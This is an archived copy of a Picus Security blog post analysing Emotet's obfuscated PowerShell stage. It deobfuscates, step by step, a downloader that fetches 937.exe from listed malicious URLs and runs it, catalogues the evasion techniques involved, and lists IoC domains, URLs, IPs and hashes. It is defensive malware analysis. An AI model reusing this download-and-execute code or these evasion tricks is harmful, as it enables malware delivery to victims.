{
	"id": "488cecfd-cbb3-4924-aa9a-445ce81174c5",
	"created_at": "2026-04-06T00:06:48.115652Z",
	"updated_at": "2026-04-10T13:12:20.251399Z",
	"deleted_at": null,
	"sha1_hash": "6d0c61cc0ec60122852e85ab9599886f4be13444",
	"title": "An Analysis of Emotet Malware: PowerShell Unobfuscation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 414639,
	"plain_text": "An Analysis of Emotet Malware: PowerShell Unobfuscation\r\nBy Picus Security Inc.\r\nPublished: 2020-07-14 · Archived: 2026-04-05 20:44:00 UTC\r\n7 min read\r\nJul 14, 2020\r\nby Süleyman Özarslan, PhD\r\nPress enter or click to view image in full size\r\nResearchers identified Emotet for the first time in 2014 as a banking malware stealing sensitive and private\r\ninformation. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware,\r\nincluding other banking Trojans. Emotet incorporates various obfuscation and evasion techniques to avoid\r\ndetection, and these techniques change over time.\r\nWe revealed obfuscated Visual Basic codes in the first part of the Emotet Technical Analysis series . In this second\r\npart, we analyze the PowerShell codes in the Emotet malware document ( PowerShell, MITRE ATT\u0026CK T1086 ).\r\nWe analyzed the following Word document step by step in the first part:\r\nMD5: 515f13034bc4ccf635b026722fd5ef9c\r\nSHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 1 of 9\n\nSHA-256:\r\nVirusTotal detection rate: 13/61 as of January 21, 2020\r\nNames: ST_28546448.doc, 01856218536426646.doc\r\n1) VBA code analysis\r\nLet’s remember the revealed VBA code ( Scripting, MITRE ATT\u0026CK T1064 ):\r\n1.\r\nDo While GetObject(winmgmtS:win32_Process).Create(\"Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAY\r\nLoop\r\nIn this Do While loop, the Create method of the Win32_Process class is used to create a new process.\r\n💡 The Create WMI class method creates a new process.\r\nSyntax:\r\nuint32 Create(\r\n [in] string CommandLine,\r\n [in] string CurrentDirectory,\r\n [in] Win32_ProcessStartup ProcessStartupInformation,\r\n [out] uint32 ProcessId\r\n);\r\nThe first variable is the CommandLine to execute. It is a PowerShell command in this code (\r\nPowerShell, MITRE ATT\u0026CK T1086 ).\r\nThe second variable is the CurrentDirectory . If this parameter is NULL , the new process will have the\r\nsame path as the calling process.\r\nThe third variable is ProcessStartupInformation , like winmgmtS:win32_ProcessStartuP in this\r\nexample.\r\n💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based\r\nprocess. The class is defined as a method type definition, which means that it is only used for passing information\r\nto the Create method of the Win32_Process class.\r\nThe last variable is the global process identifier that can be used to identify a process.\r\nTherefore, the VBA code embedded in the Word document executes a PowerShell command using WMI (\r\nWindows Management Instrumentation, MITRE ATT\u0026CK T1047 ) .\r\n💡 Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on\r\nWindows-based operating systems.\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 2 of 9\n\n2) Analyzing the PowerShell parameters\r\nWe’ll reveal the obfuscated malicious PowerShell command in this blog. Let's remember the PowerShell\r\ncommand:\r\n2.\r\nPowershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7\r\nLet’s start with the -w parameter and the hidden value: -w hidden . However, there is not a parameter\r\nnamed -w according to the official PowerShell documentation . In fact, the -w parameter is completed\r\nby PowerShell as the -WindowStyle parameter because of the parameter substring completion feature of\r\nPowerShell .\r\n💡 PowerShell Parameter Completion: Substrings of parameters like -NoEx (- NoExit), -Executi (-\r\nExecutionPolicy), -w (-WindowStyle) are used in the PowerShell command instead of using the complete\r\nparameter string to avoid detection. Because of the way that PowerShell handles parameters, parameter substrings\r\nlike -W, -Wi, -WindowSt, -WindowSty, are all valid ways of specifying an execution argument such as -\r\nWindowStyle.\r\n💡 -w can be used for -WindowStyle , because -WindowStyle is the only parameter starts with -w .\r\nAdversaries commonly use the -WindowStyle parameter with Hidden value in malicious PowerShell\r\ncommands to avoid detection ( Hidden Window, MITRE ATT\u0026CK T1143 ). Actually, -WindowStyle Hidden does\r\nnot entirely hide the PowerShell command windows, it shows the command window for a while before hiding it.\r\n💡 -WindowStyle parameter sets the window style for the session. Valid values are Normal, Minimized,\r\nMaximized, and Hidden .\r\nThe second parameter is -en . Similar to -w , there is not a parameter named -en according to the\r\nofficial PowerShell documentation . The -en parameter is completed as -EncodedCommand parameter by\r\nPowerShell.\r\n💡 The -e parameter cannot be used for the -EncodedCommand , because multiple parameters start with -e :\r\n-EncodedCommand and -ExecutionPolicy .\r\n💡 -EncodedCommand accepts a base-64-encoded string version of a command.\r\nTherefore, we must use base64 decoding to reveal the PowerShell command ( Obfuscated Files or\r\nInformation, MITRE ATT\u0026CK T1027 ). After base64 decoding:\r\n3.\r\n$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofi\r\n3) Deobfuscation of the PowerShell code\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 3 of 9\n\nLet’s beautify the code:\r\n4.\r\n$Azytjhzgaumig='Nvxdxgccbng';\r\n$Nnyjthcrzjoyv = '937';\r\n$Iiqsfpsm='Rogxpgyve';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Sbrypywxgcitf='Wpawybiqmj';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\n$Nuoltwfqh='Qrvohdiubfek';\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\n$Hkukkfoptjdr='Xabdxvkfcma';\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobq\r\n$Yzjjfplmkgx='Bxlkqmtxa';\r\nbreak;\r\n$Molchijx='Quatlbdlqvfdp'}}\r\ncatch{}}\r\n$Rckajrxvi='Ejecwargkcl'\r\nThere are garbage variables to obfuscate the code. Let’s remove them:\r\n5.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobq\r\nbreak;}}\r\ncatch{}}\r\nThere are `(backtick) characters, which are used to obfuscate the code. In this case, it is not used to escape any\r\ncharacter, so we can remove it from the code.\r\n💡 `(backtick, grave accent) character is the PowerShell's escape character.\r\n6.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 4 of 9\n\nbreak;}}\r\ncatch{}}\r\nLet’s put ‘ 937 ' in place of $Nnyjthcrzjoyv .\r\n7.\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+'937'+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh\r\nbreak;}}\r\ncatch{}}\r\nNow, let’s get rid of + characters.\r\n💡 + operator in PowerShell concatenates two string expressions and adds integers.\r\n8.\r\n$Ekxhlobqrlh=$env:userprofile\\937.exe';\r\n$Hirmyhqaltos=\u0026('new-object') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-Item') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh); b\r\ncatch{}}\r\nLet’s put ‘ $env:userprofile\\937.exe ' in place of $Ekxhlobqrlh , and ' \u0026('new-object') NeT.WeBCLiEnT ' in\r\nplace of $Hirmyhqaltos :\r\n9.\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userp\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\nbreak;}}\r\ncatch{}}\r\nLet’s change variable names with more readable ones:\r\n10.\r\n$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.c\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\\937.exe\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\nbreak;}}\r\ncatch{}}\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 5 of 9\n\nNow, we must reveal the $list variable. The Split() method is used in this variable.\r\nGet Picus Security Inc.’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n💡 Split(Char[]) splits a string into substrings that are based on the characters in the separator array.\r\nIn this case, the separator is [char]42 , which is equal to the * (asterisk) character. Therefore,\r\n11.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakis\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.\"DowNloadfiLE\"($url, $env:userprofile\\937.ex\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\ncatch{}}\r\nLet’s change random case to PascalCase:\r\n💡 Randomized case : In this old method, uppercase and lowercase letters appear in a random sequence in the\r\ncode, which is useful to bypass weak security controls.\r\n4) Analyzing the deobfuscated PowerShell code\r\n12.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakis\r\nforeach($url in $list){try{\u0026('new-object') Net.WebClient.DownloadFile\"($url, $env:userprofile\\937.exe\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"Length\" -ge 29936) {[Diagnostics.Process]::\"Start\"($env\r\nbreak;}}\r\ncatch{}}\r\nThe first line defines the $list array that includes the following URLs :\r\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 6 of 9\n\nThe second line,a foreach loop, tries to download a file from the URLS included in the $list array in\r\nthe given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the\r\n$env:userprofile directory as 937.exe .\r\n💡 Net.WebClient.DownloadFile(Uri address,string fileName()) : The WebClient.DownloadFile method of\r\nSystem.Net namespace downloads the resource with the specified URI to a local file.\r\n💡 $env:userprofile indicates the userprofile environment variable that specifies the user's profile\r\ndirectory. This directory stores personal data of the user and a typical path is C:\\Users\\Username .\r\nThe third line, an If condition, returns true if the length of the downloaded file 937.exe is greater\r\nthan or equal to 29936 bytes by using -ge 29936 comparison operator ( ge: greater than or equal ).\r\nIf it returns true, Diagnostics.Process.Start method executes the 937.exe , then exits the loop. The\r\nexact file size of 937.exe is 905472 bytes . What could be the reason for comparing the file size? The\r\nanswer is simple; adversaries are trying to figure out whether the file is actually downloaded.\r\n💡 Diagnostics.Process.Start(string fileName) : The Process.Start method of System.Diagnostics\r\nnamespace starts a process resource by specifying the name of a document or application file and associates the\r\nresource with a new Process component.\r\nAdversaries used the Invoke-Item cmdlet to execute the downloaded file in our previous Emotet analysis . Now,\r\nthey are using the Process.Start method instead of Invoke-Item to decrease the detection rate.\r\nIn our analysis, the PowerShell coded downloaded 937.exe from the first URL. The other URLs are also active.\r\nMD5: 032a5220e159fcf2f33cc9799f11ade6\r\nSHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf\r\nSHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nVirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020\r\nNames: 937.exe, 565.exe\r\nSummary\r\nThe purpose of this second part of the Emotet Technical Analysis Series is analyzing the PowerShell code\r\nincluded in the heavily obfuscated Visual Basic macros revealed in the first article. Briefly, this PowerShell code\r\ndownloads a file from a list of URLs, then executes the file as a process.\r\nAdversaries used the following techniques in the PowerShell code for obfuscation and evasion:\r\nAdversaries used the following techniques in the PowerShell code for obfuscation and evasion:\r\n1. WMI was used to create a process instead of cmd . If WMI activity is not monitored, it is hard to detect\r\nthe creation of the malicious process.\r\n2. Substrings of parameters were used instead of the complete version of the parameters. PowerShell\r\ncompletes the incomplete version of a parameter. -w was used for -WindowStyle and -en was used for\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 7 of 9\n\nthe -EncodedCommand .\r\n3. The -WindowStyle parameter was used with the Hidden value to hide the PowerShell command\r\nwindow.\r\n4. The Base64-encoded version of the PowerShell command was used with -EncodedCommand parameter.\r\n5. Garbage variable assignments were used to obfuscate the code.\r\n6. The ` (backtick character was used to obfuscate strings. For example, Dow`Nloadfi`LE was used\r\ninstead of DowNloadfiLE .\r\n7. + operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect' was used\r\ninstead of newobject to evade weak security controls.\r\n8. URLs were joined with * (asterisk) character to evade weak URL regexes of security controls. Then,\r\nthe Split() method was used to separate URLs.\r\n9. The [char] conversion function was used to obfuscate. For example, [char]42 was used for the *\r\n(asterisk) character.\r\n10. Randomized case (e.g., NeT.WeBCLiEnT ) was used to bypass weak security controls.\r\n11. The Process.Start method was used to execute the downloaded file instead of the more common\r\nexecution method like the Invoke-Item cmdlet.\r\nWhat is next?\r\nWe will analyze the behavior of the executed file 937.exe in the third part of the Emotet Technical Analysis\r\nseries.\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nExecution: T1086 PowerShell, T1064 Scripting, T1047 Windows Management Instrumentation\r\nDefense Evasion: T1027 Obfuscated Files or Information, T1143 Hidden Windows, T1064 Scripting\r\nIndicator of Compromises (IoCs)\r\nExecutable\r\ncb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nDomains\r\n5kmtechnologies.com\r\ne-twow.be\r\nqwqoo.com\r\nmagnificentpakistan.com\r\nsiwakuposo.com\r\nyesimsatirli.com\r\nURLs\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 8 of 9\n\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://humana.5kmtechnologies.com/wp-includes/KdR9xbBq1/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nhxxp://yesimsatirli.com/baby/HsWjaCfoR/\r\nIPs\r\n83.150.215.163\r\n111.90.144.211\r\nSource: https://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b"
	],
	"report_names": [
		"an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434008,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.pdf",
		"text": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.txt",
		"img": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.jpg"
	}
}